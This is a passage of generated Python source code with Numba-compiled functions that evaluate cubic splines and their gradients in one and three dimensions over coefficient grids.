Phi1_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t1 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi1_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t1 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi1_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t1 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi1_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t1 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi1_0 = (
_Ad[0, 0] * tp1_0
+ _Ad[0, 1] * tp1_1
+ _Ad[0, 2] * tp1_2
+ _Ad[0, 3] * tp1_3
)
Phi1_1 = (
_Ad[1, 0] * tp1_0
+ _Ad[1, 1] * tp1_1
+ _Ad[1, 2] * tp1_2
+ _Ad[1, 3] * tp1_3
)
Phi1_2 = (
_Ad[2, 0] * tp1_0
+ _Ad[2, 1] * tp1_1
+ _Ad[2, 2] * tp1_2
+ _Ad[2, 3] * tp1_3
)
Phi1_3 = (
_Ad[3, 0] * tp1_0
+ _Ad[3, 1] * tp1_1
+ _Ad[3, 2] * tp1_2
+ _Ad[3, 3] * tp1_3
)
out[n] = (
Phi0_0
* (
Phi1_0 * (coefs[i0 + 0, i1 + 0])
+ Phi1_1 * (coefs[i0 + 0, i1 + 1])
+ Phi1_2 * (coefs[i0 + 0, i1 + 2])
+ Phi1_3 * (coefs[i0 + 0, i1 + 3])
)
+ Phi0_1
* (
Phi1_0 * (coefs[i0 + 1, i1 + 0])
+ Phi1_1 * (coefs[i0 + 1, i1 + 1])
+ Phi1_2 * (coefs[i0 + 1, i1 + 2])
+ Phi1_3 * (coefs[i0 + 1, i1 + 3])
)
+ Phi0_2
* (
Phi1_0 * (coefs[i0 + 2, i1 + 0])
+ Phi1_1 * (coefs[i0 + 2, i1 + 1])
+ Phi1_2 * (coefs[i0 + 2, i1 + 2])
+ Phi1_3 * (coefs[i0 + 2, i1 + 3])
)
+ Phi0_3
* (
Phi1_0 * (coefs[i0 + 3, i1 + 0])
+ Phi1_1 * (coefs[i0 + 3, i1 + 1])
+ Phi1_2 * (coefs[i0 + 3, i1 + 2])
+ Phi1_3 * (coefs[i0 + 3, i1 + 3])
)
)
@njit(cache=True)
def vec_eval_cubic_spline_3(a, b, orders, coefs, points, out):
d = a.shape[0]
N = points.shape[0]
for n in range(N):
x0 = points[n, 0]
x1 = points[n, 1]
x2 = points[n, 2]
M0 = orders[0]
start0 = a[0]
dinv0 = (orders[0] - 1.0) / (b[0] - a[0])
M1 = orders[1]
start1 = a[1]
dinv1 = (orders[1] - 1.0) / (b[1] - a[1])
M2 = orders[2]
start2 = a[2]
dinv2 = (orders[2] - 1.0) / (b[2] - a[2])
u0 = (x0 - start0) * dinv0
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
u1 = (x1 - start1) * dinv1
i1 = int(floor(u1))
i1 = max(min(i1, M1 - 2), 0)
t1 = u1 - i1
u2 = (x2 - start2) * dinv2
i2 = int(floor(u2))
i2 = max(min(i2, M2 - 2), 0)
t2 = u2 - i2
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
tp1_0 = t1 * t1 * t1
tp1_1 = t1 * t1
tp1_2 = t1
tp1_3 = 1.0
tp2_0 = t2 * t2 * t2
tp2_1 = t2 * t2
tp2_2 = t2
tp2_3 = 1.0
Phi0_0 = 0
Phi0_1 = 0
Phi0_2 = 0
Phi0_3 = 0
if t0 < 0:
Phi0_0 = _dAd[0, 3] * t0 + _Ad[0, 3]
Phi0_1 = _dAd[1, 3] * t0 + _Ad[1, 3]
Phi0_2 = _dAd[2, 3] * t0 + _Ad[2, 3]
Phi0_3 = _dAd[3, 3] * t0 + _Ad[3, 3]
elif t0 > 1:
Phi0_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t0 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi0_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t0 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi0_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t0 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi0_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t0 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi0_0 = (
_Ad[0, 0] * tp0_0
+ _Ad[0, 1] * tp0_1
+ _Ad[0, 2] * tp0_2
+ _Ad[0, 3] * tp0_3
)
Phi0_1 = (
_Ad[1, 0] * tp0_0
+ _Ad[1, 1] * tp0_1
+ _Ad[1, 2] * tp0_2
+ _Ad[1, 3] * tp0_3
)
Phi0_2 = (
_Ad[2, 0] * tp0_0
+ _Ad[2, 1] * tp0_1
+ _Ad[2, 2] * tp0_2
+ _Ad[2, 3] * tp0_3
)
Phi0_3 = (
_Ad[3, 0] * tp0_0
+ _Ad[3, 1] * tp0_1
+ _Ad[3, 2] * tp0_2
+ _Ad[3, 3] * tp0_3
)
Phi1_0 = 0
Phi1_1 = 0
Phi1_2 = 0
Phi1_3 = 0
if t1 < 0:
Phi1_0 = _dAd[0, 3] * t1 + _Ad[0, 3]
Phi1_1 = _dAd[1, 3] * t1 + _Ad[1, 3]
Phi1_2 = _dAd[2, 3] * t1 + _Ad[2, 3]
Phi1_3 = _dAd[3, 3] * t1 + _Ad[3, 3]
elif t1 > 1:
Phi1_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t1 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi1_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t1 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi1_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t1 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi1_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t1 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi1_0 = (
_Ad[0, 0] * tp1_0
+ _Ad[0, 1] * tp1_1
+ _Ad[0, 2] * tp1_2
+ _Ad[0, 3] * tp1_3
)
Phi1_1 = (
_Ad[1, 0] * tp1_0
+ _Ad[1, 1] * tp1_1
+ _Ad[1, 2] * tp1_2
+ _Ad[1, 3] * tp1_3
)
Phi1_2 = (
_Ad[2, 0] * tp1_0
+ _Ad[2, 1] * tp1_1
+ _Ad[2, 2] * tp1_2
+ _Ad[2, 3] * tp1_3
)
Phi1_3 = (
_Ad[3, 0] * tp1_0
+ _Ad[3, 1] * tp1_1
+ _Ad[3, 2] * tp1_2
+ _Ad[3, 3] * tp1_3
)
Phi2_0 = 0
Phi2_1 = 0
Phi2_2 = 0
Phi2_3 = 0
if t2 < 0:
Phi2_0 = _dAd[0, 3] * t2 + _Ad[0, 3]
Phi2_1 = _dAd[1, 3] * t2 + _Ad[1, 3]
Phi2_2 = _dAd[2, 3] * t2 + _Ad[2, 3]
Phi2_3 = _dAd[3, 3] * t2 + _Ad[3, 3]
elif t2 > 1:
Phi2_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t2 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi2_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t2 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi2_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t2 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi2_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t2 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi2_0 = (
_Ad[0, 0] * tp2_0
+ _Ad[0, 1] * tp2_1
+ _Ad[0, 2] * tp2_2
+ _Ad[0, 3] * tp2_3
)
Phi2_1 = (
_Ad[1, 0] * tp2_0
+ _Ad[1, 1] * tp2_1
+ _Ad[1, 2] * tp2_2
+ _Ad[1, 3] * tp2_3
)
Phi2_2 = (
_Ad[2, 0] * tp2_0
+ _Ad[2, 1] * tp2_1
+ _Ad[2, 2] * tp2_2
+ _Ad[2, 3] * tp2_3
)
Phi2_3 = (
_Ad[3, 0] * tp2_0
+ _Ad[3, 1] * tp2_1
+ _Ad[3, 2] * tp2_2
+ _Ad[3, 3] * tp2_3
)
out[n] = (
Phi0_0
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3])
)
)
+ Phi0_1
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3])
)
)
+ Phi0_2
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3])
)
)
+ Phi0_3
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3])
)
)
)
@njit(cache=True)
def vec_eval_cubic_splines_G_1(a, b, orders, coefs, points, vals, dvals):
# n_vals = coefs.shape[1]
N = points.shape[0]
M0 = orders[0]
start0 = a[0]
dinv0 = (orders[0] - 1.0) / (b[0] - a[0])
for n in range(N):
x0 = points[n, 0]
u0 = (x0 - start0) * dinv0
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
Phi0_0 = 0
Phi0_1 = 0
Phi0_2 = 0
Phi0_3 = 0
if t0 < 0:
Phi0_0 = _dAd[0, 3] * t0 + _Ad[0, 3]
Phi0_1 = _dAd[1, 3] * t0 + _Ad[1, 3]
Phi0_2 = _dAd[2, 3] * t0 + _Ad[2, 3]
Phi0_3 = _dAd[3, 3] * t0 + _Ad[3, 3]
elif t0 > 1:
Phi0_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t0 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi0_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t0 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi0_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t0 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi0_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t0 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi0_0 = (
_Ad[0, 0] * tp0_0
+ _Ad[0, 1] * tp0_1
+ _Ad[0, 2] * tp0_2
+ _Ad[0, 3] * tp0_3
)
Phi0_1 = (
_Ad[1, 0] * tp0_0
+ _Ad[1, 1] * tp0_1
+ _Ad[1, 2] * tp0_2
+ _Ad[1, 3] * tp0_3
)
Phi0_2 = (
_Ad[2, 0] * tp0_0
+ _Ad[2, 1] * tp0_1
+ _Ad[2, 2] * tp0_2
+ _Ad[2, 3] * tp0_3
)
Phi0_3 = (
_Ad[3, 0] * tp0_0
+ _Ad[3, 1] * tp0_1
+ _Ad[3, 2] * tp0_2
+ _Ad[3, 3] * tp0_3
)
dPhi0_0 = (
_dAd[0, 0] * tp0_0
+ _dAd[0, 1] * tp0_1
+ _dAd[0, 2] * tp0_2
+ _dAd[0, 3] * tp0_3
) * dinv0
dPhi0_1 = (
_dAd[1, 0] * tp0_0
+ _dAd[1, 1] * tp0_1
+ _dAd[1, 2] * tp0_2
+ _dAd[1, 3] * tp0_3
) * dinv0
dPhi0_2 = (
_dAd[2, 0] * tp0_0
+ _dAd[2, 1] * tp0_1
+ _dAd[2, 2] * tp0_2
+ _dAd[2, 3] * tp0_3
) * dinv0
dPhi0_3 = (
_dAd[3, 0] * tp0_0
+ _dAd[3, 1] * tp0_1
+ _dAd[3, 2] * tp0_2
+ _dAd[3, 3] * tp0_3
) * dinv0
vals[n, 0] = (
Phi0_0 * (coefs[i0 + 0])
+ Phi0_1 * (coefs[i0 + 1])
+ Phi0_2 * (coefs[i0 + 2])
+ Phi0_3 * (coefs[i0 + 3])
)
dvals[n, 0, 0] = (
dPhi0_0 * (coefs[i0 + 0])
+ dPhi0_1 * (coefs[i0 + 1])
+ dPhi0_2 * (coefs[i0 + 2])
+ dPhi0_3 * (coefs[i0 + 3])
)
vals = vals[:, 0]
dvals = dvals[:, :, 0]
@njit(cache=True)
def vec_eval_cubic_splines_G_3(a, b, orders, coefs, points, vals, dvals):
coefs = np.expand_dims(coefs, 3)
n_vals = coefs.shape[-1]
N = points.shape[0]
M0 = orders[0]
start0 = a[0]
dinv0 = (orders[0] - 1.0) / (b[0] - a[0])
M1 = orders[1]
start1 = a[1]
dinv1 = (orders[1] - 1.0) / (b[1] - a[1])
M2 = orders[2]
start2 = a[2]
dinv2 = (orders[2] - 1.0) / (b[2] - a[2])
for n in range(N):
x0 = points[n, 0]
x1 = points[n, 1]
x2 = points[n, 2]
u0 = (x0 - start0) * dinv0
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
u1 = (x1 - start1) * dinv1
i1 = int(floor(u1))
i1 = max(min(i1, M1 - 2), 0)
t1 = u1 - i1
u2 = (x2 - start2) * dinv2
i2 = int(floor(u2))
i2 = max(min(i2, M2 - 2), 0)
t2 = u2 - i2
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
tp1_0 = t1 * t1 * t1
tp1_1 = t1 * t1
tp1_2 = t1
tp1_3 = 1.0
tp2_0 = t2 * t2 * t2
tp2_1 = t2 * t2
tp2_2 = t2
tp2_3 = 1.0
Phi0_0 = 0
Phi0_1 = 0
Phi0_2 = 0
Phi0_3 = 0
if t0 < 0:
Phi0_0 = _dAd[0, 3] * t0 + _Ad[0, 3]
Phi0_1 = _dAd[1, 3] * t0 + _Ad[1, 3]
Phi0_2 = _dAd[2, 3] * t0 + _Ad[2, 3]
Phi0_3 = _dAd[3, 3] * t0 + _Ad[3, 3]
elif t0 > 1:
Phi0_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t0 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi0_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t0 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi0_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t0 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi0_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t0 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi0_0 = (
_Ad[0, 0] * tp0_0
+ _Ad[0, 1] * tp0_1
+ _Ad[0, 2] * tp0_2
+ _Ad[0, 3] * tp0_3
)
Phi0_1 = (
_Ad[1, 0] * tp0_0
+ _Ad[1, 1] * tp0_1
+ _Ad[1, 2] * tp0_2
+ _Ad[1, 3] * tp0_3
)
Phi0_2 = (
_Ad[2, 0] * tp0_0
+ _Ad[2, 1] * tp0_1
+ _Ad[2, 2] * tp0_2
+ _Ad[2, 3] * tp0_3
)
Phi0_3 = (
_Ad[3, 0] * tp0_0
+ _Ad[3, 1] * tp0_1
+ _Ad[3, 2] * tp0_2
+ _Ad[3, 3] * tp0_3
)
Phi1_0 = 0
Phi1_1 = 0
Phi1_2 = 0
Phi1_3 = 0
if t1 < 0:
Phi1_0 = _dAd[0, 3] * t1 + _Ad[0, 3]
Phi1_1 = _dAd[1, 3] * t1 + _Ad[1, 3]
Phi1_2 = _dAd[2, 3] * t1 + _Ad[2, 3]
Phi1_3 = _dAd[3, 3] * t1 + _Ad[3, 3]
elif t1 > 1:
Phi1_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t1 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi1_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t1 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi1_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t1 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi1_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t1 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi1_0 = (
_Ad[0, 0] * tp1_0
+ _Ad[0, 1] * tp1_1
+ _Ad[0, 2] * tp1_2
+ _Ad[0, 3] * tp1_3
)
Phi1_1 = (
_Ad[1, 0] * tp1_0
+ _Ad[1, 1] * tp1_1
+ _Ad[1, 2] * tp1_2
+ _Ad[1, 3] * tp1_3
)
Phi1_2 = (
_Ad[2, 0] * tp1_0
+ _Ad[2, 1] * tp1_1
+ _Ad[2, 2] * tp1_2
+ _Ad[2, 3] * tp1_3
)
Phi1_3 = (
_Ad[3, 0] * tp1_0
+ _Ad[3, 1] * tp1_1
+ _Ad[3, 2] * tp1_2
+ _Ad[3, 3] * tp1_3
)
Phi2_0 = 0
Phi2_1 = 0
Phi2_2 = 0
Phi2_3 = 0
if t2 < 0:
Phi2_0 = _dAd[0, 3] * t2 + _Ad[0, 3]
Phi2_1 = _dAd[1, 3] * t2 + _Ad[1, 3]
Phi2_2 = _dAd[2, 3] * t2 + _Ad[2, 3]
Phi2_3 = _dAd[3, 3] * t2 + _Ad[3, 3]
elif t2 > 1:
Phi2_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t2 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi2_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t2 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi2_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t2 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi2_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t2 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi2_0 = (
_Ad[0, 0] * tp2_0
+ _Ad[0, 1] * tp2_1
+ _Ad[0, 2] * tp2_2
+ _Ad[0, 3] * tp2_3
)
Phi2_1 = (
_Ad[1, 0] * tp2_0
+ _Ad[1, 1] * tp2_1
+ _Ad[1, 2] * tp2_2
+ _Ad[1, 3] * tp2_3
)
Phi2_2 = (
_Ad[2, 0] * tp2_0
+ _Ad[2, 1] * tp2_1
+ _Ad[2, 2] * tp2_2
+ _Ad[2, 3] * tp2_3
)
Phi2_3 = (
_Ad[3, 0] * tp2_0
+ _Ad[3, 1] * tp2_1
+ _Ad[3, 2] * tp2_2
+ _Ad[3, 3] * tp2_3
)
dPhi0_0 = (
_dAd[0, 0] * tp0_0
+ _dAd[0, 1] * tp0_1
+ _dAd[0, 2] * tp0_2
+ _dAd[0, 3] * tp0_3
) * dinv0
dPhi0_1 = (
_dAd[1, 0] * tp0_0
+ _dAd[1, 1] * tp0_1
+ _dAd[1, 2] * tp0_2
+ _dAd[1, 3] * tp0_3
) * dinv0
dPhi0_2 = (
_dAd[2, 0] * tp0_0
+ _dAd[2, 1] * tp0_1
+ _dAd[2, 2] * tp0_2
+ _dAd[2, 3] * tp0_3
) * dinv0
dPhi0_3 = (
_dAd[3, 0] * tp0_0
+ _dAd[3, 1] * tp0_1
+ _dAd[3, 2] * tp0_2
+ _dAd[3, 3] * tp0_3
) * dinv0
dPhi1_0 = (
_dAd[0, 0] * tp1_0
+ _dAd[0, 1] * tp1_1
+ _dAd[0, 2] * tp1_2
+ _dAd[0, 3] * tp1_3
) * dinv1
dPhi1_1 = (
_dAd[1, 0] * tp1_0
+ _dAd[1, 1] * tp1_1
+ _dAd[1, 2] * tp1_2
+ _dAd[1, 3] * tp1_3
) * dinv1
dPhi1_2 = (
_dAd[2, 0] * tp1_0
+ _dAd[2, 1] * tp1_1
+ _dAd[2, 2] * tp1_2
+ _dAd[2, 3] * tp1_3
) * dinv1
dPhi1_3 = (
_dAd[3, 0] * tp1_0
+ _dAd[3, 1] * tp1_1
+ _dAd[3, 2] * tp1_2
+ _dAd[3, 3] * tp1_3
) * dinv1
dPhi2_0 = (
_dAd[0, 0] * tp2_0
+ _dAd[0, 1] * tp2_1
+ _dAd[0, 2] * tp2_2
+ _dAd[0, 3] * tp2_3
) * dinv2
dPhi2_1 = (
_dAd[1, 0] * tp2_0
+ _dAd[1, 1] * tp2_1
+ _dAd[1, 2] * tp2_2
+ _dAd[1, 3] * tp2_3
) * dinv2
dPhi2_2 = (
_dAd[2, 0] * tp2_0
+ _dAd[2, 1] * tp2_1
+ _dAd[2, 2] * tp2_2
+ _dAd[2, 3] * tp2_3
) * dinv2
dPhi2_3 = (
_dAd[3, 0] * tp2_0
+ _dAd[3, 1] * tp2_1
+ _dAd[3, 2] * tp2_2
+ _dAd[3, 3] * tp2_3
) * dinv2
for k in range(n_vals):
vals[n, k] = (
Phi0_0
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3, k])
)
)
+ Phi0_1
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2, k])
